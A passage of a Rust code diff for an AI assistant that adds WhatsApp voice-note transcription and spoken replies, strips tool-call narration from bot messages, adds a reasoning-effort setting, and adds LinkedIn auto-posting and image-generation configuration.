reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
+79 -3
View File
@@ -1499,7 +1499,68 @@ fn sanitize_channel_response(response: &str, tools: &[Box<dyn Tool>]) -> String
.iter()
.map(|tool| tool.name().to_ascii_lowercase())
.collect();
strip_isolated_tool_json_artifacts(response, &known_tool_names)
// Strip XML-style tool-call tags (e.g. <tool_call>...</tool_call>)
let stripped_xml = strip_tool_call_tags(response);
// Strip isolated tool-call JSON artifacts
let stripped_json = strip_isolated_tool_json_artifacts(&stripped_xml, &known_tool_names);
// Strip leading narration lines that announce tool usage
strip_tool_narration(&stripped_json)
}
/// Remove leading lines that narrate tool usage (e.g. "Let me check the weather for you.").
///
/// Only strips lines from the very beginning of the message that match common
/// narration patterns, so genuine content is preserved.
fn strip_tool_narration(message: &str) -> String {
let narration_prefixes: &[&str] = &[
"let me ",
"i'll ",
"i will ",
"i am going to ",
"i'm going to ",
"searching ",
"looking up ",
"fetching ",
"checking ",
"using the ",
"using my ",
"one moment",
"hold on",
"just a moment",
"give me a moment",
"allow me to ",
];
let mut result_lines: Vec<&str> = Vec::new();
let mut past_narration = false;
for line in message.lines() {
if past_narration {
result_lines.push(line);
continue;
}
let trimmed = line.trim();
if trimmed.is_empty() {
continue;
}
let lower = trimmed.to_lowercase();
if narration_prefixes.iter().any(|p| lower.starts_with(p)) {
// Skip this narration line
continue;
}
// First non-narration, non-empty line — keep everything from here
past_narration = true;
result_lines.push(line);
}
let joined = result_lines.join("\n");
let trimmed = joined.trim();
if trimmed.is_empty() && !message.trim().is_empty() {
// If stripping removed everything, return original to avoid empty reply
message.to_string()
} else {
trimmed.to_string()
}
}
fn is_tool_call_payload(value: &serde_json::Value, known_tool_names: &HashSet<String>) -> bool {
@@ -2697,6 +2758,17 @@ pub fn build_system_prompt_with_mode(
use std::fmt::Write;
let mut prompt = String::with_capacity(8192);
// ── 0. Anti-narration (top priority) ───────────────────────
prompt.push_str(
"## CRITICAL: No Tool Narration\n\n\
NEVER narrate, announce, describe, or explain your tool usage to the user. \
Do NOT say things like 'Let me check...', 'I will use http_request to...', \
'I'll fetch that for you', 'Searching now...', or 'Using the web_search tool'. \
The user must ONLY see the final answer. Tool calls are invisible infrastructure \
never reference them. If you catch yourself starting a sentence about what tool \
you are about to use or just used, DELETE it and give the answer directly.\n\n",
);
// ── 1. Tooling ──────────────────────────────────────────────
if !tools.is_empty() {
prompt.push_str("## Tools\n\n");
@@ -2836,7 +2908,9 @@ pub fn build_system_prompt_with_mode(
prompt.push_str("- You are running as a messaging bot. Your response is automatically sent back to the user's channel.\n");
prompt.push_str("- You do NOT need to ask permission to respond — just respond directly.\n");
prompt.push_str("- NEVER repeat, describe, or echo credentials, tokens, API keys, or secrets in your responses.\n");
prompt.push_str("- If a tool output contains credentials, they have already been redacted — do not mention them.\n\n");
prompt.push_str("- If a tool output contains credentials, they have already been redacted — do not mention them.\n");
prompt.push_str("- When a user sends a voice note, it is automatically transcribed to text. Your text reply is automatically converted to a voice note and sent back. Do NOT attempt to generate audio yourself — TTS is handled by the channel.\n");
prompt.push_str("- NEVER narrate or describe your tool usage. Do NOT say 'Let me fetch...', 'I will use...', 'Searching...', or similar. Give the FINAL ANSWER only — no intermediate steps, no tool mentions, no progress updates.\n\n");
if prompt.is_empty() {
"You are ZeroClaw, a fast and efficient AI assistant built in Rust. Be helpful, concise, and direct."
@@ -3346,7 +3420,8 @@ fn collect_configured_channels(
wa.pair_code.clone(),
wa.allowed_numbers.clone(),
)
.with_transcription(config.transcription.clone()),
.with_transcription(config.transcription.clone())
.with_tts(config.tts.clone()),
),
});
} else {
@@ -3662,6 +3737,7 @@ pub async fn start_channels(config: Config) -> Result<()> {
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
+44 -1
View File
@@ -39,6 +39,47 @@ fn normalize_audio_filename(file_name: &str) -> String {
}
}
/// Resolve the API key for voice transcription.
///
/// Priority order:
/// 1. Explicit `config.api_key` (if set and non-empty).
/// 2. Provider-specific env var based on `api_url`:
/// - URL contains "openai.com" -> `OPENAI_API_KEY`
/// - URL contains "groq.com" -> `GROQ_API_KEY`
/// 3. Fallback chain: `TRANSCRIPTION_API_KEY` -> `GROQ_API_KEY` -> `OPENAI_API_KEY`.
fn resolve_transcription_api_key(config: &TranscriptionConfig) -> Result<String> {
// 1. Explicit config key
if let Some(ref key) = config.api_key {
let trimmed = key.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
}
// 2. Provider-specific env var based on API URL
if config.api_url.contains("openai.com") {
if let Ok(key) = std::env::var("OPENAI_API_KEY") {
return Ok(key);
}
} else if config.api_url.contains("groq.com") {
if let Ok(key) = std::env::var("GROQ_API_KEY") {
return Ok(key);
}
}
// 3. Fallback chain
for var in ["TRANSCRIPTION_API_KEY", "GROQ_API_KEY", "OPENAI_API_KEY"] {
if let Ok(key) = std::env::var(var) {
return Ok(key);
}
}
bail!(
"No API key found for voice transcription — set one of: \
transcription.api_key in config, TRANSCRIPTION_API_KEY, GROQ_API_KEY, or OPENAI_API_KEY"
);
}
/// Validate audio data and resolve MIME type from file name.
///
/// Returns `(normalized_filename, mime_type)` on success.
@@ -710,8 +751,10 @@ mod tests {
#[tokio::test]
async fn rejects_missing_api_key() {
// Ensure fallback env key is absent for this test.
// Ensure all candidate keys are absent for this test.
std::env::remove_var("GROQ_API_KEY");
std::env::remove_var("OPENAI_API_KEY");
std::env::remove_var("TRANSCRIPTION_API_KEY");
let data = vec![0u8; 100];
let config = TranscriptionConfig::default();
+1
View File
@@ -85,6 +85,7 @@ impl TtsProvider for OpenAiTtsProvider {
"input": text,
"voice": voice,
"speed": self.speed,
"response_format": "opus",
});
let resp = self
+315 -90
View File
@@ -64,8 +64,17 @@ pub struct WhatsAppWebChannel {
client: Arc<Mutex<Option<Arc<wa_rs::Client>>>>,
/// Message sender channel
tx: Arc<Mutex<Option<tokio::sync::mpsc::Sender<ChannelMessage>>>>,
/// Voice transcription configuration
/// Voice transcription (STT) config
transcription: Option<crate::config::TranscriptionConfig>,
/// Text-to-speech config for voice replies
tts_config: Option<crate::config::TtsConfig>,
/// Chats awaiting a voice reply — maps chat JID to the latest substantive
/// reply text. A background task debounces and sends the voice note after
/// the agent finishes its turn (no new send() for 3 seconds).
pending_voice:
Arc<std::sync::Mutex<std::collections::HashMap<String, (String, std::time::Instant)>>>,
/// Chats whose last incoming message was a voice note.
voice_chats: Arc<std::sync::Mutex<std::collections::HashSet<String>>>,
}
impl WhatsAppWebChannel {
@@ -93,10 +102,13 @@ impl WhatsAppWebChannel {
client: Arc::new(Mutex::new(None)),
tx: Arc::new(Mutex::new(None)),
transcription: None,
tts_config: None,
pending_voice: Arc::new(std::sync::Mutex::new(std::collections::HashMap::new())),
voice_chats: Arc::new(std::sync::Mutex::new(std::collections::HashSet::new())),
}
}
/// Configure voice transcription.
/// Configure voice transcription (STT) for incoming voice notes.
#[cfg(feature = "whatsapp-web")]
pub fn with_transcription(mut self, config: crate::config::TranscriptionConfig) -> Self {
if config.enabled {
@@ -105,6 +117,15 @@ impl WhatsAppWebChannel {
self
}
/// Configure text-to-speech for outgoing voice replies.
#[cfg(feature = "whatsapp-web")]
pub fn with_tts(mut self, config: crate::config::TtsConfig) -> Self {
if config.enabled {
self.tts_config = Some(config);
}
self
}
/// Check if a phone number is allowed (E.164 format: +1234567890)
#[cfg(feature = "whatsapp-web")]
fn is_number_allowed(&self, phone: &str) -> bool {
@@ -287,6 +308,134 @@ impl WhatsAppWebChannel {
format!("{expanded_session_path}-shm"),
]
}
/// Attempt to download and transcribe a WhatsApp voice note.
///
/// Returns `None` if transcription is disabled, download fails, or
/// transcription fails (all logged as warnings).
#[cfg(feature = "whatsapp-web")]
async fn try_transcribe_voice_note(
client: &wa_rs::Client,
audio: &wa_rs_proto::whatsapp::message::AudioMessage,
transcription_config: Option<&crate::config::TranscriptionConfig>,
) -> Option<String> {
let config = transcription_config?;
// Enforce duration limit
if let Some(seconds) = audio.seconds {
if u64::from(seconds) > config.max_duration_secs {
tracing::info!(
"WhatsApp Web: skipping voice note ({}s exceeds {}s limit)",
seconds,
config.max_duration_secs
);
return None;
}
}
// Download the encrypted audio
use wa_rs::download::Downloadable;
let audio_data = match client.download(audio as &dyn Downloadable).await {
Ok(data) => data,
Err(e) => {
tracing::warn!("WhatsApp Web: failed to download voice note: {e}");
return None;
}
};
// Determine filename from mimetype for transcription API
let file_name = match audio.mimetype.as_deref() {
Some(m) if m.contains("opus") || m.contains("ogg") => "voice.ogg",
Some(m) if m.contains("mp4") || m.contains("m4a") => "voice.m4a",
Some(m) if m.contains("mpeg") || m.contains("mp3") => "voice.mp3",
Some(m) if m.contains("webm") => "voice.webm",
_ => "voice.ogg", // WhatsApp default
};
tracing::info!(
"WhatsApp Web: transcribing voice note ({} bytes, file={})",
audio_data.len(),
file_name
);
match super::transcription::transcribe_audio(audio_data, file_name, config).await {
Ok(text) if text.trim().is_empty() => {
tracing::info!("WhatsApp Web: voice transcription returned empty text, skipping");
None
}
Ok(text) => {
tracing::info!(
"WhatsApp Web: voice note transcribed ({} chars)",
text.len()
);
Some(text)
}
Err(e) => {
tracing::warn!("WhatsApp Web: voice transcription failed: {e}");
None
}
}
}
/// Synthesize text to speech and send as a WhatsApp voice note (static version for spawned tasks).
#[cfg(feature = "whatsapp-web")]
async fn synthesize_voice_static(
client: &wa_rs::Client,
to: &wa_rs_binary::jid::Jid,
text: &str,
tts_config: &crate::config::TtsConfig,
) -> Result<()> {
let tts_manager = super::tts::TtsManager::new(tts_config)?;
let audio_bytes = tts_manager.synthesize(text).await?;
let audio_len = audio_bytes.len();
tracing::info!("WhatsApp Web TTS: synthesized {} bytes of audio", audio_len);
if audio_bytes.is_empty() {
anyhow::bail!("TTS returned empty audio");
}
use wa_rs_core::download::MediaType;
let upload = client
.upload(audio_bytes, MediaType::Audio)
.await
.map_err(|e| anyhow!("Failed to upload TTS audio: {e}"))?;
tracing::info!(
"WhatsApp Web TTS: uploaded audio (url_len={}, file_length={})",
upload.url.len(),
upload.file_length
);
// Estimate duration: Opus at ~32kbps → bytes / 4000 ≈ seconds
#[allow(clippy::cast_possible_truncation)]
let estimated_seconds = std::cmp::max(1, (upload.file_length / 4000) as u32);
let voice_msg = wa_rs_proto::whatsapp::Message {
audio_message: Some(Box::new(wa_rs_proto::whatsapp::message::AudioMessage {
url: Some(upload.url),
direct_path: Some(upload.direct_path),
media_key: Some(upload.media_key),
file_enc_sha256: Some(upload.file_enc_sha256),
file_sha256: Some(upload.file_sha256),
file_length: Some(upload.file_length),
mimetype: Some("audio/ogg; codecs=opus".to_string()),
ptt: Some(true),
seconds: Some(estimated_seconds),
..Default::default()
})),
..Default::default()
};
Box::pin(client.send_message(to.clone(), voice_msg))
.await
.map_err(|e| anyhow!("Failed to send voice note: {e}"))?;
tracing::info!(
"WhatsApp Web TTS: sent voice note ({} bytes, ~{}s)",
audio_len,
estimated_seconds
);
Ok(())
}
}
#[cfg(feature = "whatsapp-web")]
@@ -315,6 +464,88 @@ impl Channel for WhatsAppWebChannel {
}
let to = self.recipient_to_jid(&message.recipient)?;
// Voice chat mode: send text normally AND queue a voice note of the
// final answer. Only substantive messages (not tool outputs) are queued.
// A debounce task waits 10s after the last substantive message, then
// sends ONE voice note. Text in → text out. Voice in → text + voice out.
let is_voice_chat = self
.voice_chats
.lock()
.map(|vs| vs.contains(&message.recipient))
.unwrap_or(false);
if is_voice_chat && self.tts_config.is_some() {
let content = &message.content;
// Only queue substantive natural-language replies for voice.
// Skip tool outputs: URLs, JSON, code blocks, errors, short status.
let is_substantive = content.len() > 40
&& !content.starts_with("http")
&& !content.starts_with('{')
&& !content.starts_with('[')
&& !content.starts_with("Error")
&& !content.contains("```")
&& !content.contains("tool_call")
&& !content.contains("wttr.in");
if is_substantive {
if let Ok(mut pv) = self.pending_voice.lock() {
pv.insert(
message.recipient.clone(),
(content.clone(), std::time::Instant::now()),
);
}
let pending = self.pending_voice.clone();
let voice_chats = self.voice_chats.clone();
let client_clone = client.clone();
let to_clone = to.clone();
let recipient = message.recipient.clone();
let tts_config = self.tts_config.clone().unwrap();
tokio::spawn(async move {
// Wait 10 seconds — long enough for the agent to finish its
// full tool chain and send the final answer.
tokio::time::sleep(tokio::time::Duration::from_secs(10)).await;
// Atomic check-and-remove: only one task gets the value
let to_voice = pending.lock().ok().and_then(|mut pv| {
if let Some((_, ts)) = pv.get(&recipient) {
if ts.elapsed().as_secs() >= 8 {
return pv.remove(&recipient).map(|(text, _)| text);
}
}
None
});
if let Some(text) = to_voice {
if let Ok(mut vc) = voice_chats.lock() {
vc.remove(&recipient);
}
match Box::pin(WhatsAppWebChannel::synthesize_voice_static(
&client_clone,
&to_clone,
&text,
&tts_config,
))
.await
{
Ok(()) => {
tracing::info!(
"WhatsApp Web: voice reply sent ({} chars)",
text.len()
);
}
Err(e) => {
tracing::warn!("WhatsApp Web: TTS voice reply failed: {e}");
}
}
}
});
}
// Fall through to send text normally (voice chat gets BOTH)
}
// Send text message
let outgoing = wa_rs_proto::whatsapp::Message {
conversation: Some(message.content.clone()),
..Default::default()
@@ -322,7 +553,7 @@ impl Channel for WhatsAppWebChannel {
let message_id = client.send_message(to, outgoing).await?;
tracing::debug!(
"WhatsApp Web: sent message to {} (id: {})",
"WhatsApp Web: sent text to {} (id: {})",
message.recipient,
message_id
);
@@ -394,6 +625,9 @@ impl Channel for WhatsAppWebChannel {
let session_revoked_clone = session_revoked.clone();
let transcription_config = self.transcription.clone();
let transcription_config = self.transcription.clone();
let voice_chats = self.voice_chats.clone();
let mut builder = Bot::builder()
.with_backend(backend)
.with_transport_factory(transport_factory)
@@ -405,27 +639,15 @@ impl Channel for WhatsAppWebChannel {
let retry_count = retry_count_clone.clone();
let session_revoked = session_revoked_clone.clone();
let transcription_config = transcription_config.clone();
let voice_chats = voice_chats.clone();
async move {
match event {
Event::Message(msg, info) => {
// Extract message content
let text = msg.text_content().unwrap_or("");
let sender_jid = info.source.sender.clone();
let sender_alt = info.source.sender_alt.clone();
let sender = sender_jid.user().to_string();
let chat = info.source.chat.to_string();
tracing::info!(
"WhatsApp Web message received (sender_len={}, chat_len={}, text_len={})",
sender.len(),
chat.len(),
text.len()
);
tracing::debug!(
"WhatsApp Web message content: {}",
text
);
let mapped_phone = if sender_jid.is_lid() {
client.get_phone_number_from_lid(&sender_jid.user).await
} else {
@@ -437,93 +659,92 @@ impl Channel for WhatsAppWebChannel {
mapped_phone.as_deref(),
);
if let Some(normalized) = sender_candidates
let normalized = match sender_candidates
.iter()
.find(|candidate| {
Self::is_number_allowed_for_list(&allowed_numbers, candidate)
})
.cloned()
{
let content = if !text.trim().is_empty() {
text.trim().to_string()
} else if let Some(ref audio) = msg.get_base_message().audio_message {
let duration = audio.seconds.unwrap_or(0);
tracing::info!(
"WhatsApp Web audio from {} ({}s, ptt={})",
normalized, duration, audio.ptt.unwrap_or(false)
Some(n) => n,
None => {
tracing::warn!(
"WhatsApp Web: message from unrecognized sender not in allowed list (candidates_count={})",
sender_candidates.len()
);
let config = match transcription_config.as_ref() {
Some(c) => c,
None => {
tracing::debug!("WhatsApp Web: transcription disabled, ignoring audio");
return;
}
};
if u64::from(duration) > config.max_duration_secs {
tracing::info!(
"WhatsApp Web: skipping audio ({}s > {}s limit)",
duration, config.max_duration_secs
);
return;
}
let audio_data = match client.download(audio.as_ref()).await {
Ok(d) => d,
Err(e) => {
tracing::warn!("WhatsApp Web: failed to download audio: {e}");
return;
}
};
let file_name = match audio.mimetype.as_deref() {
Some(m) if m.contains("ogg") => "voice.ogg",
Some(m) if m.contains("opus") => "voice.opus",
Some(m) if m.contains("mp4") || m.contains("m4a") => "voice.m4a",
Some(m) if m.contains("webm") => "voice.webm",
_ => "voice.ogg",
};
match super::transcription::transcribe_audio(audio_data, file_name, config).await {
Ok(t) if !t.trim().is_empty() => {
tracing::info!("WhatsApp Web: transcribed audio from {}: {}", normalized, t.trim());
t.trim().to_string()
}
Ok(_) => {
tracing::info!("WhatsApp Web: transcription returned empty text");
return;
}
Err(e) => {
tracing::warn!("WhatsApp Web: transcription failed: {e}");
return;
}
}
} else {
tracing::debug!("WhatsApp Web: ignoring non-text/non-audio message from {}", normalized);
return;
};
}
};
if let Err(e) = tx_inner
.send(ChannelMessage {
id: uuid::Uuid::new_v4().to_string(),
channel: "whatsapp".to_string(),
sender: normalized.clone(),
// Reply to the originating chat JID (DM or group).
reply_target: chat,
content,
timestamp: chrono::Utc::now().timestamp() as u64,
thread_ts: None,
})
// Attempt voice note transcription (ptt = push-to-talk = voice note)
let voice_text = if let Some(ref audio) = msg.audio_message {
if audio.ptt == Some(true) {
Self::try_transcribe_voice_note(
&client,
audio,
transcription_config.as_ref(),
)
.await
{
tracing::error!("Failed to send message to channel: {}", e);
} else {
tracing::debug!(
"WhatsApp Web: ignoring non-PTT audio message from {}",
normalized
);
None
}
} else {
tracing::warn!(
"WhatsApp Web: message from unrecognized sender not in allowed list (candidates_count={})",
sender_candidates.len()
None
};
// Use transcribed voice text, or fall back to text content.
// Track whether this chat used a voice note so we reply in kind.
// We store the chat JID (reply_target) since that's what send() receives.
let content = if let Some(ref vt) = voice_text {
if let Ok(mut vs) = voice_chats.lock() {
vs.insert(chat.clone());
}
format!("[Voice] {vt}")
} else {
if let Ok(mut vs) = voice_chats.lock() {
vs.remove(&chat);
}
let text = msg.text_content().unwrap_or("");
text.trim().to_string()
};
tracing::info!(
"WhatsApp Web message received (sender_len={}, chat_len={}, content_len={})",
sender.len(),
chat.len(),
content.len()
);
tracing::debug!(
"WhatsApp Web message content: {}",
content
);
if content.is_empty() {
tracing::debug!(
"WhatsApp Web: ignoring empty or non-text message from {}",
normalized
);
return;
}
if let Err(e) = tx_inner
.send(ChannelMessage {
id: uuid::Uuid::new_v4().to_string(),
channel: "whatsapp".to_string(),
sender: normalized.clone(),
// Reply to the originating chat JID (DM or group).
reply_target: chat,
content,
timestamp: chrono::Utc::now().timestamp() as u64,
thread_ts: None,
})
.await
{
tracing::error!("Failed to send message to channel: {}", e);
}
}
Event::Connected(_) => {
@@ -764,6 +985,10 @@ impl WhatsAppWebChannel {
pub fn with_transcription(self, _config: crate::config::TranscriptionConfig) -> Self {
self
}
pub fn with_tts(self, _config: crate::config::TtsConfig) -> Self {
self
}
}
#[cfg(not(feature = "whatsapp-web"))]
+3 -1
View File
@@ -13,7 +13,9 @@ pub use schema::{
DockerRuntimeConfig, EdgeTtsConfig, ElevenLabsTtsConfig, EmbeddingRouteConfig, EstopConfig,
FeishuConfig, GatewayConfig, GoogleSttConfig, GoogleTtsConfig, GoogleWorkspaceConfig,
HardwareConfig, HardwareTransport, HeartbeatConfig, HooksConfig, HttpRequestConfig,
IMessageConfig, IdentityConfig, KnowledgeConfig, LarkConfig, MatrixConfig, McpConfig,
IMessageConfig, IdentityConfig, ImageProviderDalleConfig, ImageProviderFluxConfig,
ImageProviderImagenConfig, ImageProviderStabilityConfig, KnowledgeConfig, LarkConfig,
LinkedInConfig, LinkedInContentConfig, LinkedInImageConfig, MatrixConfig, McpConfig,
McpServerConfig, McpTransport, MemoryConfig, Microsoft365Config, ModelRouteConfig,
MultimodalConfig, NextcloudTalkConfig, NodeTransportConfig, NodesConfig, NotionConfig,
ObservabilityConfig, OpenAiSttConfig, OpenAiTtsConfig, OpenVpnTunnelConfig, OtpConfig,
+377 -3
View File
@@ -331,6 +331,10 @@ pub struct Config {
/// Knowledge graph configuration (`[knowledge]`).
#[serde(default)]
pub knowledge: KnowledgeConfig,
/// LinkedIn integration configuration (`[linkedin]`).
#[serde(default)]
pub linkedin: LinkedInConfig,
}
/// Multi-client workspace isolation configuration.
@@ -520,6 +524,28 @@ where
validate_temperature(value).map_err(serde::de::Error::custom)
}
fn normalize_reasoning_effort(value: &str) -> std::result::Result<String, String> {
let normalized = value.trim().to_ascii_lowercase();
match normalized.as_str() {
"minimal" | "low" | "medium" | "high" | "xhigh" => Ok(normalized),
_ => Err(format!(
"reasoning_effort {value:?} is invalid (expected one of: minimal, low, medium, high, xhigh)"
)),
}
}
fn deserialize_reasoning_effort_opt<'de, D>(
deserializer: D,
) -> std::result::Result<Option<String>, D::Error>
where
D: serde::Deserializer<'de>,
{
let value: Option<String> = Option::deserialize(deserializer)?;
value
.map(|raw| normalize_reasoning_effort(&raw).map_err(serde::de::Error::custom))
.transpose()
}
fn default_max_depth() -> u32 {
3
}
@@ -1486,6 +1512,10 @@ fn default_true() -> bool {
true
}
fn default_false() -> bool {
false
}
impl Default for GatewayConfig {
fn default() -> Self {
Self {
@@ -2223,6 +2253,272 @@ impl Default for KnowledgeConfig {
}
}
// ── LinkedIn ────────────────────────────────────────────────────
/// LinkedIn integration configuration (`[linkedin]` section).
///
/// When enabled, the `linkedin` tool is registered in the agent tool surface.
/// Requires `LINKEDIN_*` credentials in the workspace `.env` file.
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInConfig {
/// Enable the LinkedIn tool.
#[serde(default)]
pub enabled: bool,
/// LinkedIn REST API version header (YYYYMM format).
#[serde(default = "default_linkedin_api_version")]
pub api_version: String,
/// Content strategy for automated posting.
#[serde(default)]
pub content: LinkedInContentConfig,
/// Image generation for posts (`[linkedin.image]`).
#[serde(default)]
pub image: LinkedInImageConfig,
}
impl Default for LinkedInConfig {
fn default() -> Self {
Self {
enabled: false,
api_version: default_linkedin_api_version(),
content: LinkedInContentConfig::default(),
image: LinkedInImageConfig::default(),
}
}
}
fn default_linkedin_api_version() -> String {
"202602".to_string()
}
/// Content strategy configuration for LinkedIn auto-posting (`[linkedin.content]`).
///
/// The agent reads this via the `linkedin get_content_strategy` action to know
/// what feeds to check, which repos to highlight, and how to write posts.
#[derive(Debug, Clone, Default, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInContentConfig {
/// RSS feed URLs to monitor for topic inspiration (titles only).
#[serde(default)]
pub rss_feeds: Vec<String>,
/// GitHub usernames whose public activity to reference.
#[serde(default)]
pub github_users: Vec<String>,
/// GitHub repositories to highlight (format: `owner/repo`).
#[serde(default)]
pub github_repos: Vec<String>,
/// Topics of expertise and interest for post themes.
#[serde(default)]
pub topics: Vec<String>,
/// Professional persona description (name, role, expertise).
#[serde(default)]
pub persona: String,
/// Freeform posting instructions for the AI agent.
#[serde(default)]
pub instructions: String,
}
/// Image generation configuration for LinkedIn posts (`[linkedin.image]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInImageConfig {
/// Enable image generation for posts.
#[serde(default)]
pub enabled: bool,
/// Provider priority order. Tried in sequence; first success wins.
#[serde(default = "default_image_providers")]
pub providers: Vec<String>,
/// Generate a branded SVG text card when all AI providers fail.
#[serde(default = "default_true")]
pub fallback_card: bool,
/// Accent color for the fallback card (CSS hex).
#[serde(default = "default_card_accent_color")]
pub card_accent_color: String,
/// Temp directory for generated images, relative to workspace.
#[serde(default = "default_image_temp_dir")]
pub temp_dir: String,
/// Stability AI provider settings.
#[serde(default)]
pub stability: ImageProviderStabilityConfig,
/// Google Imagen (Vertex AI) provider settings.
#[serde(default)]
pub imagen: ImageProviderImagenConfig,
/// OpenAI DALL-E provider settings.
#[serde(default)]
pub dalle: ImageProviderDalleConfig,
/// Flux (fal.ai) provider settings.
#[serde(default)]
pub flux: ImageProviderFluxConfig,
}
fn default_image_providers() -> Vec<String> {
vec![
"stability".into(),
"imagen".into(),
"dalle".into(),
"flux".into(),
]
}
fn default_card_accent_color() -> String {
"#0A66C2".into()
}
fn default_image_temp_dir() -> String {
"linkedin/images".into()
}
impl Default for LinkedInImageConfig {
fn default() -> Self {
Self {
enabled: false,
providers: default_image_providers(),
fallback_card: true,
card_accent_color: default_card_accent_color(),
temp_dir: default_image_temp_dir(),
stability: ImageProviderStabilityConfig::default(),
imagen: ImageProviderImagenConfig::default(),
dalle: ImageProviderDalleConfig::default(),
flux: ImageProviderFluxConfig::default(),
}
}
}
/// Stability AI image generation settings (`[linkedin.image.stability]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderStabilityConfig {
/// Environment variable name holding the API key.
#[serde(default = "default_stability_api_key_env")]
pub api_key_env: String,
/// Stability model identifier.
#[serde(default = "default_stability_model")]
pub model: String,
}
fn default_stability_api_key_env() -> String {
"STABILITY_API_KEY".into()
}
fn default_stability_model() -> String {
"stable-diffusion-xl-1024-v1-0".into()
}
impl Default for ImageProviderStabilityConfig {
fn default() -> Self {
Self {
api_key_env: default_stability_api_key_env(),
model: default_stability_model(),
}
}
}
/// Google Imagen (Vertex AI) settings (`[linkedin.image.imagen]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderImagenConfig {
/// Environment variable name holding the API key.
#[serde(default = "default_imagen_api_key_env")]
pub api_key_env: String,
/// Environment variable for the Google Cloud project ID.
#[serde(default = "default_imagen_project_id_env")]
pub project_id_env: String,
/// Vertex AI region.
#[serde(default = "default_imagen_region")]
pub region: String,
}
fn default_imagen_api_key_env() -> String {
"GOOGLE_VERTEX_API_KEY".into()
}
fn default_imagen_project_id_env() -> String {
"GOOGLE_CLOUD_PROJECT".into()
}
fn default_imagen_region() -> String {
"us-central1".into()
}
impl Default for ImageProviderImagenConfig {
fn default() -> Self {
Self {
api_key_env: default_imagen_api_key_env(),
project_id_env: default_imagen_project_id_env(),
region: default_imagen_region(),
}
}
}
/// OpenAI DALL-E settings (`[linkedin.image.dalle]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderDalleConfig {
/// Environment variable name holding the OpenAI API key.
#[serde(default = "default_dalle_api_key_env")]
pub api_key_env: String,
/// DALL-E model identifier.
#[serde(default = "default_dalle_model")]
pub model: String,
/// Image dimensions.
#[serde(default = "default_dalle_size")]
pub size: String,
}
fn default_dalle_api_key_env() -> String {
"OPENAI_API_KEY".into()
}
fn default_dalle_model() -> String {
"dall-e-3".into()
}
fn default_dalle_size() -> String {
"1024x1024".into()
}
impl Default for ImageProviderDalleConfig {
fn default() -> Self {
Self {
api_key_env: default_dalle_api_key_env(),
model: default_dalle_model(),
size: default_dalle_size(),
}
}
}
/// Flux (fal.ai) image generation settings (`[linkedin.image.flux]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderFluxConfig {
/// Environment variable name holding the fal.ai API key.
#[serde(default = "default_flux_api_key_env")]
pub api_key_env: String,
/// Flux model identifier.
#[serde(default = "default_flux_model")]
pub model: String,
}
fn default_flux_api_key_env() -> String {
"FAL_API_KEY".into()
}
fn default_flux_model() -> String {
"fal-ai/flux/schnell".into()
}
impl Default for ImageProviderFluxConfig {
fn default() -> Self {
Self {
api_key_env: default_flux_api_key_env(),
model: default_flux_model(),
}
}
}
// ── Proxy ───────────────────────────────────────────────────────
/// Proxy application scope — determines which outbound traffic uses the proxy.
@@ -3296,6 +3592,9 @@ pub struct RuntimeConfig {
/// - `Some(false)`: disable reasoning/thinking when supported
#[serde(default)]
pub reasoning_enabled: Option<bool>,
/// Optional reasoning effort for providers that expose a level control.
#[serde(default, deserialize_with = "deserialize_reasoning_effort_opt")]
pub reasoning_effort: Option<String>,
}
/// Docker runtime configuration (`[runtime.docker]` section).
@@ -3370,6 +3669,7 @@ impl Default for RuntimeConfig {
kind: default_runtime_kind(),
docker: DockerRuntimeConfig::default(),
reasoning_enabled: None,
reasoning_effort: None,
}
}
}
@@ -3635,6 +3935,13 @@ pub struct HeartbeatConfig {
/// Maximum number of heartbeat run history records to retain. Default: `100`.
#[serde(default = "default_heartbeat_max_run_history")]
pub max_run_history: u32,
/// Optional prompt prefix prepended to heartbeat task prompts.
#[serde(default)]
pub prompt_prefix: Option<String>,
/// Optional allowlist of tool names the heartbeat agent may use.
/// When `None`, all tools are available.
#[serde(default)]
pub allowed_tools: Option<Vec<String>>,
}
fn default_two_phase() -> bool {
@@ -3669,6 +3976,8 @@ impl Default for HeartbeatConfig {
deadman_channel: None,
deadman_to: None,
max_run_history: default_heartbeat_max_run_history(),
prompt_prefix: None,
allowed_tools: None,
}
}
}
@@ -3899,8 +4208,8 @@ pub struct ChannelsConfig {
pub ack_reactions: bool,
/// Whether to send tool-call notification messages (e.g. `🔧 web_search_tool: …`)
/// to channel users. When `false`, tool calls are still logged server-side but
/// not forwarded as individual channel messages. Default: `true`.
#[serde(default = "default_true")]
/// not forwarded as individual channel messages. Default: `false`.
#[serde(default = "default_false")]
pub show_tool_calls: bool,
/// Persist channel conversation history to JSONL files so sessions survive
/// daemon restarts. Files are stored in `{workspace}/sessions/`. Default: `true`.
@@ -4062,7 +4371,7 @@ impl Default for ChannelsConfig {
bluesky: None,
message_timeout_secs: default_channel_message_timeout_secs(),
ack_reactions: true,
show_tool_calls: true,
show_tool_calls: false,
session_persistence: true,
session_backend: default_session_backend(),
session_ttl_hours: 0,
@@ -5584,6 +5893,7 @@ impl Default for Config {
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
}
}
}
@@ -7039,6 +7349,16 @@ impl Config {
}
}
if let Ok(raw) = std::env::var("ZEROCLAW_REASONING_EFFORT")
.or_else(|_| std::env::var("REASONING_EFFORT"))
